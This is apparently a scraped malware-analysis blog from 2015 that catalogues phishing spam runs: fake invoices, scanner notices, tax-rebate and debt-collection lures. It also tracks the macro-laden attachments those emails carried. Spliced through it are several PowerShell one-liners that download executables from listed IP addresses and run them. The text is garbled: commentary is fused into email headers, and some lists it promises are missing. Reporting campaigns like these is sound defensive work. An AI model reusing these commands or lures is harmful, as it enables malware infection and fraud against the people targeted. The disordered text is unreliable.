From: Matthews, Tina [tina@royalcarson.com]Running in parallel to this is another claiming to be from UK firm AquaAid which has been going on for a long time. In the first case the attachment is 20150326094147512.doc and in the second it is CAR015890001.doc, but they are the same malicious document.
Date: 9 April 2015 at 10:48
Subject: Credit card transaction
Here is the credit card transaction that you requested.
Tina Matthews
Royal Wholesale Electric
2801 East 208th Street
Carson, CA 90810
310-637-6377 Phone
310-603-9883 Fax
tina@royalcarson.com
From: Cindy Pate [Caroline.dfd@flexmail.eu]
Date: 2 April 2015 at 11:09
Subject: Scanned document from HP Scanner [66684798]
Reply to: HP-Scanner@flexmail.eu
Model:KX-240NGZDC
Location: 1st Floor Office
File Format: DOC (Medium)
Resolution: 300dpi x 300dpi
Attached file is scanned document in DOC format.
Use Microsoft Office Word of Microsoft Corporation to view the document.
----------
From: Sterling Hoffman [Lara.dc4@astroexports.com]
Date: 2 April 2015 at 11:00
Subject: Scanned document from Brother Scanner [07623989]
Reply to: Brother-Scanner@astroexports.com
Model:CG-240NWDUL
Location: 1st Floor Office
File Extension: DOC (Medium)
Resolution: 300dpi x 300dpi
Attached file is scanned document in DOC format.
Use Microsoft Office Word of Microsoft Corporation to view the document.
----------
From: Manuel Velez [Yesenia.10@acv.nl]
Date: 2 April 2015 at 12:04
Subject: Scanned document from Epson Scanner [81829722]
Reply to: Epson-Scanner@acv.nl
Model:JS-240NRZYV
Location: 1st Floor Office
File Format: DOC (Medium)
Resolution: 300dpi x 300dpi
Attached file is scanned document in DOC format.
Use Microsoft Office Word of Microsoft Corporation to view the document.
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://193.26.217.202/sqwere/casma.gif','%TEMP%\giuguiGIUGdsuf87t6F.cab'); expand %TEMP%\giuguiGIUGdsuf87t6F.cab %TEMP%\giuguiGIUGdsuf87t6F.exe; Start-Process %TEMP%\giuguiGIUGdsuf87t6F.exe;Because there are probably several different versions of this script, there are probably several different download locations. In this case, a fake .GIF file is downloaded from a malware server at 193.26.217.202 (Servachok Ltd, Russia) which is actually an .EXE file, but it gets saved as a .CAB file. For no very good reason it is passed through EXPAND which does nothing but save it to %TEMP%\giuguiGIUGdsuf87t6F.exe.
Date: 19 March 2015 at 12:52Attached is a file with a random numerical name (e.g. 802186031.doc) which is in fact a malicious XML file that appears to drop the Dridex banking trojan. Indication are that this can run even with macros disabled. Each attachment has a unique MD5.
Subject: Aspiring Solicitors Debt Collection
Aspiring Solicitors
Ref : 195404544
Date : 02.10.2014
Dear Sir, Madam
Re: Our Client Bank of Scotland PLC
Account Number:77666612
Balance: 2,345.00
We are instructed by Bank of Scotland PLC in relation to the above matter.
You are required to pay the balance of GBP 2,345.00 in full within 7(seven) days from the date of this email to avoid Country Court proceedings being issued against you. Once proceedings have been issued, you will be liable for court fees and solicitors costs detailed below.
Court Fees GBP 245.00
Solicitors Costs GBP 750.00
Cheques or Postal Orders should be made payable to Bank of Scotland PLC and sent to the address in attachment below quoting the above account number.
We are instructed by our Client that they can accept payment by either Debit or Credit Card.If you wish to make a payment in this wa, then please contact us with your Card details. We will then pass these details on to our Client in order that they may process your agreed payment. Kindly note that any payment made will be shown on your Bank and/or Credit Card Statement as being made to Bank of Scotland PLC
If you have any queries regarding this matter or have a genuine reason for non payment, you should contact us within 7 days from the date of this email to avoid legal proceedings being issued against you, by filling the contact us form in attachment below.
Yours faithfully,
Shawn Ballard
Aspiring Solicitors
Department CCD, Box 449
Upper Ground Floor
1-5 Queens Road Quadrant
Brighton
BN1 3XJ
United Kingdom
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://193.26.217.199/smoozy/shake.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;FYI, those IPs are allocated as follows:
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://91.226.93.51/smoozy/shake.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://91.227.18.76/smoozy/shake.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://176.31.28.244/smoozy/shake.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;
From: Korey MackSo far I have only seen a single sample with an attached file called 11IDJ325.doc which is undetected by AV vendors. Inside is a malicious macro [pastebin] with an encrypted section that executes this:
Date: 18 March 2015 at 11:04
Subject: December unpaid invoice notification
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://176.31.28.244/smoozy/shake.exe','%TEMP%\huiUGI8t8dsF.cab'); expand %TEMP%\huiUGI8t8dsF.cab %TEMP%\huiUGI8t8dsF.exe; start %TEMP%\huiUGI8t8dsF.exe;Although the EXE file from 176.31.28.244 (OVH, France / Bitweb LLC, Russia) is downloaded as a CAB file and then EXPANDed to an EXE, there is in fact no file transformation happening at all (which is odd). This executable has a detection rate of 2/57.
From: della.richards2124@nwn.co.uk [della.richards@nwn.co.uk]Attached is a file NWN Confirmation Letter.doc which I have so far seen in two different versions, both with low detection rates [1] [2] which contain slightly different malicious macros [1] [2] which then go and download a malicious binary from one of the following locations:
Date: 18 March 2015 at 08:34
Subject: Confirmation of Booking
This booking confirmation forms a binding contract between yourselves and NWN Media Ltd.
If you do not agree with any of the details above then please contact the named sales representative on the above number immediately.
Yours sincerely,
Della
NWN Media Ltd
From: Erasmo Small
Date: 12 March 2015 at 09:40
Subject: Invoice [3479XZM] for payment to INCOME & GROWTH VCT PLC(THE)
From: Eli Ramirez
Date: 12 March 2015 at 08:37
Subject: Invoice [4053FJK] for payment to RANDGOLD RESOURCES
From: Richard Baxter
Date: 12 March 2015 at 08:37
Subject: Invoice [3020JQM] for payment to TARSUS GROUP PLC
From: Megan Dennis
Date: 12 March 2015 at 09:36
Subject: Invoice [4706CEZ] for payment to SHANKS GROUP
From: Voicemail admin@victimdomainThe attachment is a ZIP file containing a malicious EXE file called MSG00311.WAV.exe which has a VirusTotal detection rate of 5/57. According to the Malwr report, it pulls down another executable and some config files from:
Date: 11/03/2015 11:48
Subject: Voicemail Message (07813297716) From:07813297716
IP Office Voicemail redirected message
Attachment: MSG00311.WAV.ZIP
From: Long Fletcher
Date: 11 March 2015 at 09:44
Subject: Remittance Advice
Good Morning,
Please find attached the BACS Remittance Advice for payment made by RENEW HLDGS.
Please note this may show on your account as a payment reference of FPALSDB.
Kind Regards
Long Fletcher
Finance Coordinator
Attachment: LSDB.xls
----------
From: Vaughn Baker
Date: 11 March 2015 at 09:27
Subject: Your Remittance Advice [FPABHKZCNZ]
Good Morning,
Please find attached the BACS Remittance Advice for payment made by JD SPORTS FASHION PLC.
Please note this may show on your account as a payment reference of FPABHKZCNZ.
Kind Regards
Vaughn Baker
Senior Accountant
----------
From: HMRC
Date: 11 March 2015 at 10:04
Subject: Your Tax rebate
Dear [redacted],
After the last yearly computations of your financial functioning we have defined that you have the right to obtain a tax rebate of 934.80. Please confirm the tax rebate claim and permit us have 6-9 days so that we execute it. A rebate can be postponed for a variety of reasons. For instance confirming unfounded data or applying not in time.
To access the form for your tax rebate, view the report attached. Document Reference: (196XQBK).
Regards, HM Revenue Service. We apologize for the inconvenience.
The security and confidentiality of your personal information is important for us. If you have any questions, please either call the toll-free customer service phone number.
© 2014, all rights reserved
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://193.26.217.39/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;These are probably compromised hosts, for the record they are:
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://93.170.123.36/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://85.143.166.190/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://46.30.42.177/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;
From: Mick George Invoicing [mginv@mickgeorge.co.uk]Something has gone wrong with the formatting, it is meant to look like this:
Date: 6 March 2015 at 09:29
Subject: Mick George Invoice 395687
Please find attached a copy of your invoice 395687.
If you have any queries regarding the invoice, please do not hesitate to co=
ntact us by emailing mginv@mickgeorge.co.uk<mailto:mginv@mickegeorge.co.uk>=
or calling our finance department on 01480 499125.
Regards
Finance Team
MICK GEORGE[http://mickgeorgeskips.co.uk/wp-content/uploads/2014/08/image00=
1.jpg] (r)
T: 01480 499125
F: 01480 498077
www.mickgeorge.co.uk<http://www.mickgeorge.co.uk/>
Lancaster House, Meadow Lane, St Ives, Cambs, PE27 4YQ [http://mickgeorges=
kips.co.uk/wp-content/uploads/2014/08/image003.jpg] <https://plus.google.co=
m/109160871896788819541/posts> [http://mickgeorgeskips.co.uk/wp-content/=
uploads/2014/08/image004.jpg] <https://twitter.com/mickgeorgeltd>
Specialists in Earthworks * Aggregates * Skip Hire * Contaminated Land Serv=
ices & Remediation * Demolition * Contracting
Waste Management & Recycling * Landfill & Tipping Facilities * Asbestos Rem=
oval * Ready Mix Concrete & Floor Screeds
[Concrete signature]<http://mickgeorgeskips.co.uk/wp-content/uploads/2014/0=
8/Concrete-signature.jpg>
Disclaimer
This email and any attachments are intended only for the use of the individ=
ual or entity to which it is directed and may contain information that is p=
rivileged, confidential and exempt from disclosure under applicable law.
If you have received this email and you are not the intended recipient or t=
he employee or agent responsible for delivering this email to the intended =
recipient, please inform Mick George on +44 (0)1480 498099 and then delete =
the email from your system. If you are not a named addressee you must not u=
se, disclose, disseminate, distribute, copy, print or reply to this email.
Although Mick George Ltd routinely screens for viruses, addressees should s=
can this email and any attachments for viruses. Mick George Ltd makes no re=
presentation or warranty as to the absence of viruses in this email or any =
attachments. Please note for the protection of our clients and business, we=
may monitor and read emails sent to and from our server(s).
Mick George Ltd
Please find attached a copy of your invoice 395687.
If you have any queries regarding the invoice, please do not hesitate to contact us by emailing mginv@mickgeorge.co.uk or calling our finance department on 01480 499125.
Regards
Finance Team
MICK GEORGE®
T: 01480 499125
F: 01480 498077
www.mickgeorge.co.uk
Specialists in Earthworks • Aggregates • Skip Hire • Contaminated Land Services & Remediation • Demolition • Contracting
Lancaster House, Meadow Lane, St Ives, Cambs, PE27 4YQ
Waste Management & Recycling • Landfill & Tipping Facilities • Asbestos Removal • Ready Mix Concrete & Floor Screeds
Disclaimer
This email and any attachments are intended only for the use of the individual or entity to which it is directed and may contain information that is privileged, confidential and exempt from disclosure under applicable law.
If you have received this email and you are not the intended recipient or the employee or agent responsible for delivering this email to the intended recipient, please inform Mick George on +44 (0)1480 498099 and then delete the email from your system. If you are not a named addressee you must not use, disclose, disseminate, distribute, copy, print or reply to this email.
Although Mick George Ltd routinely screens for viruses, addressees should scan this email and any attachments for viruses. Mick George Ltd makes no representation or warranty as to the absence of viruses in this email or any attachments. Please note for the protection of our clients and business, we may monitor and read emails sent to and from our server(s).
Mick George Ltd
Registered no. 2417831 (England)
From: Internal Revenue Service [refund.noreply@irs.gov]
Date: 6 March 2015 at 08:48
Subject: Your 2015 Electronic IP Pin!
Dear Member
This is to inform you that our system has generated your new secured Electronic PIN to e-file your 2014 tax return.
Please kindly download the microsoft file to securely review it.
Thanks
Internal Revenue Service
915 Second Avenue, MS W180
From: Bobby Drell [rob@abbottpainting.com]Attached is a file Brochure2.doc which has a low detection rate which contains this malicious macro [pastebin] which downloads a component from the following location:
Date: 5 March 2015 at 10:27
Subject: Brochure2.doc
Please change the year to 2015.
Please confirm receipt
Thanks
Bobby Drell
From: LogMeIn.com [no_reply@logmein.com]Attached is a malicious Excel document called logmein_pro_receipt.xls with a VirusTotal detection rate of 0/56. Usually in a spam run like this there are several different versions of the document but so far I have only seen one, containing this malicious macro. The macro downloads a file from:
Date: 25 February 2015 at 08:52
Subject: Your LogMeIn Pro payment has been processed!
Dear client,
Thank you for purchasing our yearly plan for LogMeIn Pro on 25 computers.
Your credit card has been successfully charged.
Date : 25/2/2015
Amount : $999 ( you saved $749.75)
The transaction details can be found in the attached receipt.
Your computers will be automatically upgraded the next time you sign in.
Thank you for choosing LogMeIn!
From: Lawrence Fisher [l.fisher@taghire.co.uk]So far I have only seen one sample of this, with an attachment named Invoice 0215.doc which has zero detections according to VirusTotal. It contains an obfuscated Word macro which downloads an additional component from:
Date: 16 February 2015 at 08:25
Subject: invoice
Here is the invoice
Kind Regards,
Lawrence Fisher
T.A.G. (The Automotive Group) Ltd.
Unit 22 Coney Green Business Centre Wingfield View, Clay Cross, Chesterfield
Tel: 020 3750 0638
Description: 150px Crop Background Remove Logo
This e-mail is confidential and may be privileged. It may be read, copied and used only by the intended recipient. If you have received it in error, please contact the sender immediately by return e-mail or by telephoning 020 3750 0638
From: Lydia OnealThe company name and the name of the sender varies, but most of the body text remains identical. Some sample subjects are:
Date: 11 February 2015 at 09:14
Subject: Your latest e-invoice from HSBC HLDGS
Dear Valued Customer,
Please find attached your latest invoice that has been posted to your online account. You’ll be pleased to know that your normal payment terms still apply as detailed on your invoice.
Rest assured, we operate a secure system, so we can confirm that the invoice DOC originates from HSBC HLDGS and is authenticated with a digital signature.
Thank you for using e-invoicing with HSBC HLDGS - the smarter, faster, greener way of processing invoices.
This message and any attachment are confidential and may be privileged or otherwise protected from disclosure.
If you are not the intended recipient, please telephone or email the sender and delete this message and any attachment from your system.
If you are not the intended recipient you must not copy this message or attachment or disclose the contents to any other person.
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://136.243.237.222:8080/hhacz45a/mnnmz.php','%TEMP%\pJIOfdfs.exe');Start-Process '%TEMP%\pJIOfdfs.exe';The macro is calling Powershell to download and execute code from these locations:
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://185.48.56.62:8080/hhacz45a/mnnmz.php','%TEMP%\pJIOfdfs.exe');Start-Process '%TEMP%\pJIOfdfs.exe';
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://95.163.121.216:8080/hhacz45a/mnnmz.php','%TEMP%\pJIOfdfs.exe');Start-Process '%TEMP%\pJIOfdfs.exe';
from: Alan CaseOther names and job titles seen include:
date: 15 January 2015 at 08:49
subject: Payment request of 4176.94 (14 JAN 2015)
Dear Sirs,
Sub: Remitance of GBP 4176.94
This is with reference to the above, we request you to kindly remit GBP 4176.94 in favor of our bank account.
For more information on our bank details please refer to the attached document.
Thanking you,
Alan Case Remittance Manager
Alan Case
Melisa Howell
Brooke Barr
Nanette Lloyd
Holly Hartman
Doreen Mclean
Lonnie Boyer
Jessica Richardson
Celeste Singleton
Katie Hahn
Marilyn Barnett
Lois Powell
Donald Yang
Christina Grimes
Keenan Graham
Muriel Prince
Chance Salazar
Francine Nixon
Accounting Team
Senior Accounts
Senior Accounts Payable
Senior Accountant
General Manager
Remittance Manager
